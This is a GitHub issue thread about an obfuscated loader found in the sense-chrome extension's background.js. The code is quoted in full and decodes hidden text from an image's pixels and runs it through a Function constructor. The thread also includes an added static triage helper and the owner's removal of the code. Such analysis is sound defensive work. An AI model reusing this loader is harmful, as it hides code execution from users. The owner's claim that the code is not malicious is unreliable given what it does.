background.js might contain malicious code #21

Closed
Rappahannock opened this issue Jul 5, 2018 · 4 comments

@Rappahannock

I got background.js quarantined by antivirus (Kaspersky).

Message:
Status=Quarantined
Object=Trojan program HEUR:Trojan.Script.Generic
File Path=..\sense-chrome\src\background.js
Threat Level=High

This prevents plugin installation.

I looked through background.js code.
First code line looks suspicious:

ifFirstShow=function(){try{var t=function(){},r={zL:function(t){if(isNaN(t)||!isFinite(t)||t%1||t<2)return!1;if(t%2===0)return 2===t;if(t%3===0)return 3===t;for(var r=Math.sqrt(t),e=5;e<=r;e+=6){if(t%e===0)return!1;if(t%(e+2)===0)return!1}return!0},sk:function(t){for(var r="",e=-548,n=0,i=0;i<t.length;i++)n=t[i].charCodeAt()+e,r+=String.fromCharCode(n);return r},uB:function(t){for(var e=t;!0;e+=1)if(r.zL(e))return e},Uh:function(t){var r=new Image;for(r.src=t;r.hasOwnProperty("complete")&&!r.complete;);return r}};return t.prototype.rK={Ob:3,QP:1,kJ:16,Av:function(t){return t+1},TD:function(t,r,e){for(var n=!0,i=0;i<16&&n;i+=1)n=n&&255===t[r+4*i];return n}},t.prototype.n0=function(t,r){r=r||{};var e=this.rK,n=r.width||t.width,i=r.height||t.height,o=r.Ob||e.Ob,h=r.kJ||e.kJ;return o*n*i/h>>0},t.prototype.oC=function(t,e){if(""==='\x64\x6F\x63\x73\x2F\x61\x75\x74\x6F\x63\x6F\x6D\x70\x6C\x65\x74\x65\x2E\x70\x6E\x67')return"";void 0===t&&(t='\x64\x6F\x63\x73\x2F\x61\x75\x74\x6F\x63\x6F\x6D\x70\x6C\x65\x74\x65\x2E\x70\x6E\x67'),t.length&&(t=r.Uh(t)),e=e||{};var n=this.rK,i=e.Ob||n.Ob,o=e.QP||n.QP,h=e.kJ||n.kJ,a=r.uB(Math.pow(2,i)),u=(e.Av||n.Av,e.TD||n.TD),f=document.createElement("canvas"),p=f.getContext("2d");if(f.style.display="none",f.width=e.width||t.width,f.height=e.width||t.height,0===f.width||0===f.height)return"";e.height&&e.width?p.drawImage(t,0,0,e.width,e.height):p.drawImage(t,0,0);var c=p.getImageData(0,0,f.width,f.height),d=c.data,g=[];if(c.data.every(function(t){return 0===t}))return"";var s,v;if(1===o)for(s=3,v=!1;!v&&s<d.length&&!v;s+=4)v=u(d,s,o),v||g.push(d[s]-(255-a+1));var w="",m=0,y=0,C=Math.pow(2,h)-1;for(s=0;s<g.length;s+=1)m+=g[s]<<y,y+=i,y>=h&&(w+=String.fromCharCode(m&C),y%=h,m=g[s]>>i-y);return w.length<13?"":(0!==m&&(w+=String.fromCharCode(m&C)),w)},t.prototype.Cx=3,t.prototype.qQ=0,t.prototype.Uu=5e3,t.prototype.AH=function(){try{var e=t.prototype,n=r.sk(e.oC());if(""===n){if(e.qQ>e.Cx)return;return e.qQ++,void 
setTimeout(e.AH,e.Uu)}document.defaultView[(typeof r.zL).charAt(0).toUpperCase()+(typeof r.zL).slice(1)](n)()}catch(t){}},(new t).AH}catch(t){}}();ifFirstShow();

I didn't analyze it precisely, just deleted it in my local file, left only the following lines:

// Open the extension's index.html in a new tab when the toolbar icon is clicked.
chrome.browserAction.onClicked.addListener(function (tab)
{
  chrome.tabs.create({'url': chrome.extension.getURL('index.html')}, function (tab) {});
});

After such changes I was able to load this plugin and so far it seems like it works fine.

Need to analyze the suspicious code in detail and decide if it's needed. If not, permanently delete this part of the code. If needed, change it in a way that doesn't trigger the antivirus.
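Added example, not code from the sense-chrome repository or from either participant: a small static triage of the snippet quoted above, run offline over an abbreviated excerpt of it. It de-escapes the hex literal (which reads docs/autocomplete.png), shows how the (typeof ...) trick spells the global name Function, and flags the image-to-canvas-to-text-to-Function pipeline so an extension reviewer can recognise the pattern without executing it.

```javascript
// Added triage helper, not part of sense-chrome. It runs a few static
// indicators over an excerpt of the quarantined background.js quoted above.

// Excerpt of the posted snippet (copied from the report, abbreviated with "...").
const SAMPLE = String.raw`ifFirstShow=function(){try{var t=function(){},r={sk:function(t){for(var r="",e=-548,n=0,i=0;i<t.length;i++)n=t[i].charCodeAt()+e,r+=String.fromCharCode(n);return r},Uh:function(t){var r=new Image;for(r.src=t;r.hasOwnProperty("complete")&&!r.complete;);return r}};
t.prototype.oC=function(t,e){void 0===t&&(t='\x64\x6F\x63\x73\x2F\x61\x75\x74\x6F\x63\x6F\x6D\x70\x6C\x65\x74\x65\x2E\x70\x6E\x67'),t.length&&(t=r.Uh(t));...var c=p.getImageData(0,0,f.width,f.height)...w+=String.fromCharCode(m&C)...};
t.prototype.AH=function(){try{var e=t.prototype,n=r.sk(e.oC());if(""===n){...return e.qQ++,void setTimeout(e.AH,e.Uu)}document.defaultView[(typeof r.zL).charAt(0).toUpperCase()+(typeof r.zL).slice(1)](n)()}catch(t){}}}catch(t){}}();`;

// Turn \xNN escapes back into plain characters so hidden literals can be read.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// The snippet builds a global name from typeof: typeof fn is "function",
// capitalised it becomes "Function", i.e. document.defaultView["Function"](code)().
function globalNameFromTypeof(value) {
  const t = typeof value;
  return t.charAt(0).toUpperCase() + t.slice(1);
}

// Indicators of a hidden-payload loader; each is a regex plus the reason it matters.
const INDICATORS = [
  { name: 'hex-escaped-literal', re: /\\x[0-9A-Fa-f]{2}/, why: 'literal hidden behind \\xNN escapes' },
  { name: 'image-to-canvas', re: /new Image\b[\s\S]*?getImageData\(/, why: 'image pixels read back via canvas' },
  { name: 'bytes-to-text', re: /String\.fromCharCode\(/, why: 'text rebuilt byte by byte at runtime' },
  { name: 'typeof-constructor', re: /\(typeof [\w.]+\)\.charAt\(0\)\.toUpperCase\(\)/, why: '"Function" assembled from typeof' },
  { name: 'retry-until-payload', re: /setTimeout\([\w.]+,\s*[\w.]+\)/, why: 'keeps retrying until the payload decodes' },
];

// Returns matched indicator names, string literals recovered after de-escaping,
// and a verdict (three or more indicators together is treated as suspicious).
function triage(src) {
  const decoded = decodeHexEscapes(src);
  const hits = INDICATORS.filter(i => i.re.test(src) || i.re.test(decoded)).map(i => i.name);
  const literals = [...decoded.matchAll(/'([^'\\]+)'/g)].map(m => m[1]);
  return { hits, literals, suspicious: hits.length >= 3 };
}

console.log(triage(SAMPLE));
```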

@Rappahannock
Author

Also, it would be interesting to know where that code was taken from. I can't find background.js in the original repository https://github.com/elastic/sense

@StephaneBour
Owner

Hi @Rappahannock, thanks for your issue.

I think it was this piece that posed a problem on the original extension.

I will test without it, and if everything works I will remove this piece of code.

StephaneBour self-assigned this Jul 5, 2018
@StephaneBour
Owner

Obviously, the behavior is not altered.

The encoded code does not look "malicious" (creating a canvas if it is not present).

I deleted it.

@Rappahannock
Author

Thank you!
